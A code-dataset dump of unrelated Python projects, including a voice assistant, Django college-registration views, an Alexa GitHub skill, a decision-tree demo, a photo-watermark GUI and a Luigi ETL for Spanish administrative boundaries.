male and 1 for female\nvoices = Speaker.getProperty('voices')\nSpeaker.setProperty('voice', voices[0].id)\n\ndef talk(text):\n Speaker.say(text)\n Speaker.runAndWait()\n\n# Taking and Printing any Command\ndef take_Command():\n try:\n Command = \"\"\n with sr.Microphone() as source:\n talk('I am ready Sir. Please tell me, how can I help you?')\n print('Now I am listening...........')\n voice = listener.listen(source)\n Command = listener.recognize_google(voice)\n Command = Command.lower()\n\n except:\n pass\n return Command\n\n# Taking a Command and performing the matching action\ndef run_Jonny():\n Command = take_Command()\n print(Command)\n\n # Let's introduce my Assistant\n if 'who are you' in Command:\n print('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n talk('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n\n elif 'yourself' in Command:\n print('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n talk('My name is Jonny & I am invented by Team Phantom. The members of team phantom are Md Rehan Ali and Md Sabbir Ahmed.')\n\n # Simple Conversation like: Hi, Hello or Good Morning\n elif 'jonny' in Command:\n Command = Command.replace('jonny', '')\n print(Command)\n talk(Command)\n\n # Playing anything using YouTube\n elif 'play' in Command:\n song = Command.replace('play', '')\n talk('playing ' + song)\n kit.playonyt(song)\n\n # Time and date\n elif 'time' in Command:\n time = dt.datetime.now().strftime('%H:%M')\n print(time)\n talk('Current time is ' + time)\n\n # Wikipedia Searching person by mentioning who is\n elif 'who is' in Command:\n person = Command.replace('who is', '')\n info = wiki.summary(person, 2)\n print(info)\n talk(info)\n\n # Wikipedia Searching something by mentioning what is\n elif 'what is' in Command:\n something = Command.replace('what is', '')\n result = wiki.summary(something, 2)\n print(result)\n talk(result)\n\n # Randomly Generated jokes\n elif 'joke' in Command:\n Jokes = pj.get_joke()\n print(Jokes)\n talk(Jokes)\n\n elif 'shutdown' in Command:\n print(Command)\n talk('Wait a Sec ! Your system is on its way to shut down.')\n os.system('shutdown /s /t 0')\n\n elif 'restart' in Command:\n print(Command)\n talk('Wait a Sec ! 
Your system is on its way to restart.')\n os.system('shutdown /r /t 0')\n\n elif 'notepad' in Command:\n print(Command)\n talk('Opening notepad')\n subprocess.Popen('notepad')\n\n elif 'browser' in Command:\n print(Command)\n talk('Opening Web browser')\n webbrowser.open('https://www.google.com')\n\n elif 'search' in Command:\n Search = Command.replace('search', '')\n talk('searching ' + Search)\n print(Command)\n webbrowser.open('https://www.google.com/search?q=' + Search)\n\n elif 'calculator' in Command:\n print('Opening Calculator')\n talk('Opening Calculator')\n subprocess.Popen('calc.exe')\n\n elif 'photo' in Command:\n print('Opening your desired photo')\n talk('Opening your desired photo')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.jpg'\n image = Image.open(file_path)\n image.show()\n\n elif 'pdf' in Command:\n print('Opening your desired pdf file')\n talk('Opening your desired pdf file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.pdf'\n os.startfile(file_path)\n\n elif 'video' in Command:\n print('Opening your desired video file')\n talk('Opening your desired video file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.mp4'\n os.startfile(file_path)\n\n elif 'powerpoint file' in Command:\n print('Opening powerpoint file')\n talk('Opening powerpoint file')\n file_path = r'D:\\Programming\\Python\\Virtual_Assistant\\Assistant.pptx'\n os.startfile(file_path)\n\n elif 'word' in Command:\n print('Opening MS word')\n talk('Opening MS word')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE'\n os.startfile(application)\n\n elif 'excel' in Command:\n print('Opening MS Excel')\n talk('Opening MS Excel')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE'\n os.startfile(application)\n\n\n elif 'powerpoint' in Command:\n print('Opening MS powerpoint')\n talk('Opening MS powerpoint')\n application = r'C:\\Program Files\\Microsoft Office\\Office16\\POWERPNT.EXE'\n os.startfile(application)\n\n elif 'code blocks' in Command:\n print('Opening Code blocks')\n talk('Opening Code blocks')\n application = r'C:\\Program Files\\CodeBlocks\\codeblocks.exe'\n os.startfile(application)\n\n\n\n # Ask the user to repeat the Command\n\n else:\n talk('Please click the run button and say the Command again.')\n\n# Call under while loop\n#while True:\n #run_Jonny()\n\n# tkinter is Python's GUI toolkit\n\nroot = Tk()\n\nroot.title('Virtual Assistant')\nroot.geometry('320x320')\n\n#img = ImageTk.PhotoImage(Image.open('Assistant.jpg'))\n#panel = Label(root, image=img)\n#panel.pack(side='right', fill='both', expand='no')\n\nuserText = StringVar()\n\nuserText.set('Welcome to our Virtual World!')\nuserFrame = LabelFrame(root, text='', font=('Railways', 20, 'bold'))\nuserFrame.pack(fill='both', expand='yes')\n\ntop = Message(userFrame, textvariable=userText, bg='light blue', fg='dark blue')\ntop.config(font=(\"Tahoma\", 25, 'bold'))\ntop.pack(side='top', fill='both', expand='yes')\n\nbtn1 = Button(root, text='Run', font=('Tahoma', 18, 'bold'), bg='light green', fg='Green', command=run_Jonny)\nbtn1.pack(fill='x', expand='no')\n\nbtn2 = Button(root, text='Close', font=('Tahoma', 18, 'bold'), bg='light yellow', fg='red', command=root.destroy)\nbtn2.pack(fill='x', 
expand='no')\n\nroot.mainloop()","repo_name":"MdRehanAli/Virtual_Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27626381005","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\n\nfrom .decorators import govt_official_required\nfrom .forms import UserRegistrationForm, CollegeRegistrationForm\nfrom customuser.models import CustomUser, Student, College\n\n# ALGORITHM FOR ID GENERATION\n# 1. Get the last college id from the database\n# 2. Generate the next word in lexicographical order\n# 3. Return the new college id\n# 4. Save the new college id in the database\n\n\ndef generateId():\n last_id = '0000'\n try:\n last_id = College.objects.last().college_id\n except:\n last_id = '0000'\n if last_id == '0000':\n return 'AAAA'\n carry = 0\n new_id = ''\n if last_id[3] == 'Z':\n carry = 1\n new_id += 'A'\n else:\n new_id += chr(ord(last_id[3]) + 1)\n i = 2\n while i >= 0 and carry == 1:\n if last_id[i] == 'Z':\n carry = 1\n new_id += 'A'\n else:\n carry = 0\n new_id += chr(ord(last_id[i]) + 1)\n i -= 1\n while i >= 0:\n new_id += last_id[i]\n i -= 1\n return new_id[::-1]\n \n# Create your views here.\n\n\n@login_required\n@govt_official_required # <-- here!\ndef home(request):\n q = request.GET.get('q')\n if q:\n colleges = College.objects.filter(\n Q(college_id__icontains=q) | Q(college_name__icontains=q)\n )\n else:\n colleges = College.objects.all()\n return render(request, 'government/home.html', {'colleges': colleges})\n\n\n@login_required\n@govt_official_required # <-- here!\ndef viewStudentsListByCollege(request, college_id):\n q = request.GET.get('q')\n college = College.objects.get(college_id=college_id)\n if q:\n students = Student.objects.filter(\n Q(college_id=college.id) & (\n Q(registration_no__icontains=q) | \n Q(name__icontains=q)\n ))\n else:\n students = Student.objects.filter(college_id=college.id)\n context = {'students': students, 'college_id': college_id, 'college_name': college.college_name}\n return render(request, 'government/view-students-list.html', context=context)\n\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n try:\n user = CustomUser.objects.get(username=username)\n if user.is_govt_official:\n user = authenticate(\n request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('govt-official-home')\n else:\n messages.info(request, 'Username or password is incorrect')\n else:\n messages.info(request, 'You are not a govt official')\n except:\n messages.info(request, 'User not found')\n\n return render(request, 'government/login.html')\n\n\ndef logoutPage(request):\n logout(request)\n return redirect('govt-official-login')\n\n\ndef registerGovtOfficialPage(request):\n form = UserRegistrationForm()\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_govt_official = True\n user.save()\n login(request, user)\n return redirect('govt-official-home')\n\n return render(request, 'government/register.html', {'form': 
form})\n\n\n@login_required\n@govt_official_required # <-- here!\ndef registerCollegeAndHead(request):\n cid = generateId()\n form1 = UserRegistrationForm()\n form2 = CollegeRegistrationForm()\n\n context = {'form1': form1, 'form2': form2, 'collegeID': cid}\n if request.method == 'POST':\n post1 = request.POST.copy()\n post2 = request.POST.copy()\n post1.pop('college_name')\n post2.pop('username')\n post2.pop('first_name')\n post2.pop('last_name')\n post2.pop('password1')\n post2.pop('password2')\n form1 = UserRegistrationForm(post1)\n form2 = CollegeRegistrationForm(post2)\n if form1.is_valid(): # <-- here!\n userInstance = form1.save(commit=False)\n # college head registered successfully\n userInstance.is_college_head = True\n userInstance.save()\n collegehead = CustomUser.objects.get(username=userInstance.username)\n\n # validate the college form before saving it\n if form2.is_valid():\n college = form2.save(commit=False)\n college.college_head = collegehead\n college.college_id = cid\n college.save()\n return redirect('govt-official-home')\n else:\n messages.info(request, 'College not registered')\n else:\n messages.info(request, 'College head not registered')\n\n return render(request, 'government/register-college-and-head.html', context=context)","repo_name":"csgeeek/student-profile-system","sub_path":"government/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71744868854","text":"\nfrom __future__ import print_function\nfrom github import Github\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_directive_response(directives):\n return {\n 'shouldEndSession': False,\n 'directives': [directives]\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"I connect to your git hub account. 
\" \\\n \"ask me to list your repos, \" \\\n \"or what's new.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask what's new.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"OK\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_notifications(intent, session):\n \"\"\" queries github for recent events on your account\n \"\"\"\n\n card_title = intent['name']\n session_attributes = {}\n reprompt_text = ''\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n events = g.get_user().get_notifications()\n num_events = 0\n event_strings = []\n for evt in events:\n num_events += 1\n if num_events <= 5:\n event_strings.append(evt.subject.type+' for '+evt.repository.name+', '+evt.subject.title)\n\n if num_events > 0:\n speech_output = \\\n 'You have {0} notifications.'.format(num_events) + ', here are the first 5. ' + \\\n ', '.join(event_strings)\n reprompt_text = ''\n else:\n speech_output = \"Nothing new since last time you asked.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef get_repos(intent, session):\n session_attributes = {}\n reprompt_text = None\n\n g = Github(session['user']['accessToken'])\n repos = g.get_user().get_repos(sort='pushed')\n index = 0\n if 'attributes' in session and 'index' in session['attributes']:\n index = int(session['attributes']['index'])\n num_repos = 0\n repo_strings = []\n for rep in repos:\n num_repos += 1\n if num_repos >= index and num_repos < (index + 4):\n repo_strings.append(str(num_repos) + ', ' + rep.name)\n # TODO: handle end of list, by ending the session\n if num_repos > 0:\n if index == 0:\n speech_output = 'You have {0} repos. The top 3 are '.format(num_repos)\n else:\n speech_output = 'The next ones are '\n speech_output = speech_output + \\\n ','.join(repo_strings) + ', Select a number or say \"more\".'\n reprompt_text = 'Should I list more?'\n should_end_session = False\n session_attributes['index'] = index + 4\n session_attributes['intent'] = 'GetRepos'\n else:\n speech_output = \"You don't have any repos in this account.\"\n should_end_session = True\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_acct_info(intent, session):\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n u = g.get_user()\n speech_output = \\\n 'You are {0}. You have {1} public repos, {2} followers and are following {3}.'. 
\\\n format(u.name, u.public_repos, u.followers, u.following)\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_orgs(intent, session):\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n orgs = g.get_user().get_orgs()\n num_orgs = 0\n org_strings = []\n for org in orgs:\n num_orgs += 1\n org_strings.append(org.url[org.url.rfind('/')+1:])\n if num_orgs > 0:\n speech_output = \\\n 'You belong to these organizations. ' + ','.join(org_strings)\n else:\n speech_output = \"You don't have any organizations in this account.\"\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef merge_pr(intent, session, dialog_state):\n filled_slots = delegate_slot_collection(intent, dialog_state)\n if intent != filled_slots:\n return filled_slots\n\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n repo_name = filled_slots['REPONAME']['value']\n pr_number = filled_slots['PRNUMBER']['value']\n\n g = Github(session['user']['accessToken'])\n repo = g.get_repo(repo_name)\n pr = repo.get_pull(int(pr_number))\n if pr.mergeable:\n pr.merge()\n speech_output = 'pull request ' + pr_number + ' merged.'\n else:\n speech_output = 'pull request ' + pr_number + ' cannot be merged.'\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef delegate_slot_collection(intent, dialog_state):\n print('dialog state = '+dialog_state)\n if dialog_state == 'STARTED':\n return build_response({}, build_directive_response({'type': 'Dialog.Delegate'}))\n # emit(':delegate', intent)\n elif dialog_state != 'COMPLETED':\n return build_response({}, build_directive_response({'type': 'Dialog.Delegate'}))\n # emit(':delegate')\n else:\n return intent\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\n \"on_session_started requestId=\" +\n session_started_request['requestId'] +\n \", sessionId=\" + session['sessionId']\n )\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.YesIntent\":\n if session['attributes']['intent'] == 'GetRepos':\n return get_repos(intent, session)\n elif intent_name == \"GetNotifications\":\n return get_notifications(intent, session)\n elif intent_name == \"GetRepos\":\n return get_repos(intent, session)\n elif intent_name == \"GetOrganizations\":\n return get_orgs(intent, session)\n elif intent_name == \"GetAcctInfo\":\n return get_acct_info(intent, session)\n elif intent_name == \"MergePullRequest\":\n return merge_pr(intent, session, intent_request.get('dialogState', None))\n 
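# Alexa's built-in intents (No/Help/Cancel/Stop) are dispatched to the generic handlers below\n 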
elif intent_name == \"AMAZON.NoIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n # if no amazon token, return a LinkAccount card\n\n if 'accessToken' not in event['session']['user']:\n return build_response({}, {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': 'to start using this skill, please use the companion app to authenticate on github',\n },\n 'card': {\n 'type': 'LinkAccount',\n },\n 'shouldEndSession': False\n })\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']}, event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"dkavanagh/skill-for-github","sub_path":"githubskill.py","file_name":"githubskill.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20835917258","text":"from sklearn import datasets\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\niris = datasets.load_iris()\r\nx = pd.DataFrame(iris['data'], columns=iris['feature_names'])\r\nprint(\"target_names: \"+str(iris['target_names']))\r\ny = pd.DataFrame(iris['target'], columns=['target'])\r\niris_data = pd.concat([x,y], axis=1)\r\niris_data = iris_data[['sepal length (cm)','petal length (cm)','target']]\r\niris_data = iris_data[iris_data['target'].isin([0,1])]\r\niris_data.head(3)\r\n\r\n\r\n# split data\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n iris_data[['sepal length (cm)','petal length (cm)']], iris_data[['target']], test_size=0.3, random_state=0)\r\n \r\nfrom sklearn.tree import DecisionTreeClassifier\r\ntree = DecisionTreeClassifier(criterion = 'entropy', random_state=0, max_depth=2)\r\ntree.fit(X_train,y_train)\r\n\r\ntree.predict(X_test)\r\ntree.score(X_test,y_test['target'])\r\n\r\nfrom matplotlib.colors import ListedColormap\r\n\r\ndef 
plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\r\n\r\n # setup marker generator and color map\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n # plot the decision surface\r\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n np.arange(x2_min, x2_max, resolution))\r\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n Z = Z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=X[y == cl, 0], \r\n y=X[y == cl, 1],\r\n alpha=0.6, \r\n c=cmap(idx),\r\n edgecolor='black',\r\n marker=markers[idx], \r\n label=cl)\r\n\r\n # highlight test samples\r\n if test_idx:\r\n # plot all test samples\r\n X_test, y_test = X[test_idx, :], y[test_idx]\r\n\r\n plt.scatter(X_test[:, 0],\r\n X_test[:, 1],\r\n facecolors='none',\r\n alpha=1.0,\r\n edgecolor='black',\r\n linewidths=1,\r\n marker='o',\r\n s=55, label='test set')\r\n \r\nplot_decision_regions(X_train.values, y_train['target'].values, classifier=tree)\r\nplt.xlabel('petal length [standardized]')\r\nplt.ylabel('petal width [standardized]')\r\nplt.legend(loc='upper left')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nfrom sklearn.tree import export_graphviz\r\nexport_graphviz(tree, out_file='tree.dot', feature_names=['sepal length (cm)','petal length (cm)']) \r\n\r\n# convert .dot to .png from the command line\r\n# dot -Tpng tree.dot -o tree.png\r\n ","repo_name":"Mowd/DataScience","sub_path":"Day2/decisionTree_test_split.py","file_name":"decisionTree_test_split.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69827849974","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__),'modules'))\nsys.path.append(os.path.join(os.path.dirname(__file__),'PhotoEdit'))\nimport readConfig\nimport AfterShot\nimport output_redirect\nimport tkinter as tk\nfrom PIL import Image,ImageTk\n\n\nclass SdxGui:\n def __init__(self):\n config=readConfig.readConfig(os.path.join(os.path.dirname(__file__),'PhotoEdit','config','PhotoEdit.config'))\n self.logo_dir=config['logo及二维码文件夹']\n\n def go(self,pic_dir='e:\\\\temp\\\\sdx\\\\to_mark',logo_type='xiong_and_zimu',thresh_hold=0.42,new_size=2400,mode='gui'):\n window=tk.Tk()\n window.title('树带熊给照片打标')\n window.geometry('300x300')\n\n logo=Image.open(os.path.join(self.logo_dir,'xiong_and_zimu.jpg'))\n logo=logo.resize((100,100))\n logo_cover=ImageTk.PhotoImage(logo)\n lb_logo=tk.Label(window,image=logo_cover)\n lb_logo.pack()\n\n lb_pos=tk.Label(window,text='logo位置',bg='#FFFFEE',font=('黑体',12),width=500,height=2)\n lb_pos.pack()\n\n pos = tk.StringVar() # define a var that ties the radiobutton value to the Label value.\n pos.set('ru')\n pos1= tk.Radiobutton(window, text='右上角', variable=pos, value='ru')\n pos1.pack()\n pos2 = tk.Radiobutton(window, text='右下角', variable=pos, value='rb')\n pos2.pack()\n\n\n msg_box=tk.Text(window) \n def put_mark():\n p=AfterShot.Photo()\n # 
p.put_mark(pic='q:\\\\temp\\\\sdx\\\\DSC_0659.jpg',logo_type='txt')\n # logo_type parameter: xiong, zimu, or xiong_and_zimu\n my_out=output_redirect.myStdout(msg_box)\n p.group_mark(pic_dir=pic_dir,logo_type=logo_type,new_size=new_size,pos=pos.get(),thresh_hold=thresh_hold,mode=mode,msg_box=msg_box)\n my_out.restoreStd()\n\n btn=tk.Button(window,text='给照片添加水印',font=('楷体',12),command=put_mark) \n btn.pack()\n msg_box.pack()\n\n window.mainloop()\n\n\n\n\nif __name__=='__main__':\n gui=SdxGui()\n gui.go(pic_dir='d:\\\\temp\\\\sdx\\\\to_mark',logo_type='xiong_and_zimu',thresh_hold=0.42,new_size=2400,mode='gui')\n","repo_name":"jack911jie/sdx","sub_path":"sdx_gui.py","file_name":"sdx_gui.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"472939967","text":"from scompose.project import Project\n\ndef main(args, parser, extra):\n '''Build or rebuild containers\n\n Containers are built once and then named as _,\n e.g. `folder_db`. If a Singularity recipe changes for a container folder,\n you can run \"singularity-compose build\" to rebuild it.\n '''\n # Initialize the project\n project = Project(filename=args.file,\n name=args.project_name,\n env_file=args.env_file)\n\n # Builds any containers into folders\n project.build(args.names)\n","repo_name":"naveen584/singularity-compose","sub_path":"scompose/client/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13299051041","text":"# flames.py\r\n\r\nimport upygame as pygame\r\nimport urandom as random\r\n\r\nclass Flames:\r\n def __init__(self, x, y, speed):\r\n self.x = x\r\n self.y = y\r\n self.startY = y\r\n self.speed = speed\r\n self.colour = random.getrandbits(1)\r\n if self.colour == 0:\r\n self.colour = 1\r\n else:\r\n self.colour = 10\r\n \r\n def update(self, x, y):\r\n self.y += self.speed\r\n \r\n if abs(self.startY - self.y) > 15:\r\n self.y = y\r\n self.startY = y\r\n \r\n # Change speed and x pos\r\n self.x = x + random.getrandbits(3)\r\n self.speed = random.getrandbits(3)\r\n if self.speed < 3:\r\n self.speed = 3\r\n \r\n # Change colour\r\n self.colour = random.getrandbits(1)\r\n if self.colour == 0:\r\n self.colour = 1\r\n else:\r\n self.colour = 10\r\n \r\n def draw (self, shakeX):\r\n pygame.draw.pixel(self.x + shakeX + 4, self.y, self.colour)","repo_name":"jvdw008/r0xitto","sub_path":"flames.py","file_name":"flames.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39734587663","text":"# -*- coding: utf-8 -*-\n# #http://centrodedescargas.cnig.es/CentroDescargas/inicio.do\n\nfrom luigi import Task, Parameter, LocalTarget, WrapperTask\nfrom tasks.util import (ColumnsTask, TableTask, shell, classpath,\n Shp2TempTableTask, current_session)\n\nfrom tasks.tags import SectionTags, SubsectionTags, UnitTags, LicenseTags\nfrom tasks.meta import OBSColumn, GEOM_REF\n\nfrom collections import OrderedDict\nimport os\n\n\nclass DownloadGeometry(Task):\n\n seq = Parameter()\n\n #http://centrodedescargas.cnig.es/CentroDescargas/downloadFile.do?seq=114023\n URL = 'http://centrodedescargas.cnig.es/CentroDescargas/downloadFile.do?seq={seq}'\n\n def run(self):\n self.output().makedirs()\n shell('wget -O {output}.zip {url}'.format(output=self.output().path,\n url=self.URL.format(seq=self.seq)))\n os.makedirs(self.output().path)\n 
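# extract the downloaded archive into the directory created above\n 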
shell('unzip -d {output} {output}.zip'.format(output=self.output().path))\n\n def output(self):\n return LocalTarget(os.path.join('tmp', classpath(self), self.seq))\n\n\nclass ImportGeometry(Shp2TempTableTask):\n\n resolution = Parameter()\n timestamp = Parameter()\n\n def requires(self):\n return DownloadGeometry(seq='114023')\n\n def input_shp(self):\n path = os.path.join('SIANE_CARTO_BASE_S_3M', 'anual', self.timestamp,\n 'SE89_3_ADMIN_{resolution}_A_X.shp'.format(\n resolution=self.resolution.upper()))\n return os.path.join(self.input().path, path)\n\n\nclass GeometryColumns(ColumnsTask):\n\n def version(self):\n return 3\n\n def requires(self):\n return {\n 'sections': SectionTags(),\n 'subsections': SubsectionTags(),\n }\n\n def columns(self):\n sections = self.input()['sections']\n subsections = self.input()['subsections']\n ccaa = OBSColumn(\n type='Geometry',\n name='Autonomous Community',\n weight=6,\n description='The first-level administrative subdivision of Spain. ',\n tags=[sections['spain'], subsections['boundary']],\n )\n prov = OBSColumn(\n type='Geometry',\n name='Province',\n weight=7,\n description='The second-level administrative subdivision of Spain, '\n 'used primarily as electoral districts and geographic '\n 'references. Provinces do not cross between autonomous '\n 'communities.',\n tags=[sections['spain'], subsections['boundary']],\n )\n muni = OBSColumn(\n type='Geometry',\n name='Municipality',\n weight=8,\n description='The lowest level of territorial organization in Spain. '\n 'Municipal boundaries do not cross between provinces. ',\n tags=[sections['spain'], subsections['boundary']],\n )\n return OrderedDict([\n ('ccaa', ccaa),\n ('prov', prov),\n ('muni', muni),\n ])\n\n\nclass GeomRefColumns(ColumnsTask):\n\n def version(self):\n return 1\n\n def requires(self):\n return GeometryColumns()\n\n def columns(self):\n cols = OrderedDict()\n session = current_session()\n for colname, coltarget in self.input().items():\n cols['id_' + colname] = OBSColumn(\n type='Text',\n name='',\n weight=0,\n targets={coltarget: GEOM_REF},\n )\n return cols\n\n\nclass Geometry(TableTask):\n\n resolution = Parameter()\n timestamp = Parameter(default='20150101')\n\n def version(self):\n return 4\n\n def requires(self):\n return {\n 'geom_columns': GeometryColumns(),\n 'geomref_columns': GeomRefColumns(),\n 'data': ImportGeometry(resolution=self.resolution,\n timestamp=self.timestamp)\n }\n\n def timespan(self):\n return self.timestamp\n\n def columns(self):\n return OrderedDict([\n ('geom_ref', self.input()['geomref_columns']['id_' + self.resolution]),\n ('the_geom', self.input()['geom_columns'][self.resolution])\n ])\n\n def geom_ref_colname(self):\n if self.resolution.lower() == 'ccaa':\n return 'id_ccaa'\n elif self.resolution.lower() == 'prov':\n return 'id_prov'\n elif self.resolution.lower() == 'muni':\n return 'id_ine'\n else:\n raise ValueError('Unknown resolution {resolution}'.format(resolution=self.resolution))\n\n def populate(self):\n session = current_session()\n query = 'INSERT INTO {output} ' \\\n 'SELECT {geom_ref_colname} geom_ref, wkb_geometry the_geom ' \\\n 'FROM {input}'.format(\n output=self.output().table,\n input=self.input()['data'].table,\n geom_ref_colname=self.geom_ref_colname())\n session.execute(query)\n\n\nclass AllGeometries(WrapperTask):\n\n def requires(self):\n for resolution in ('ccaa', 'muni', 'prov', ):\n yield 
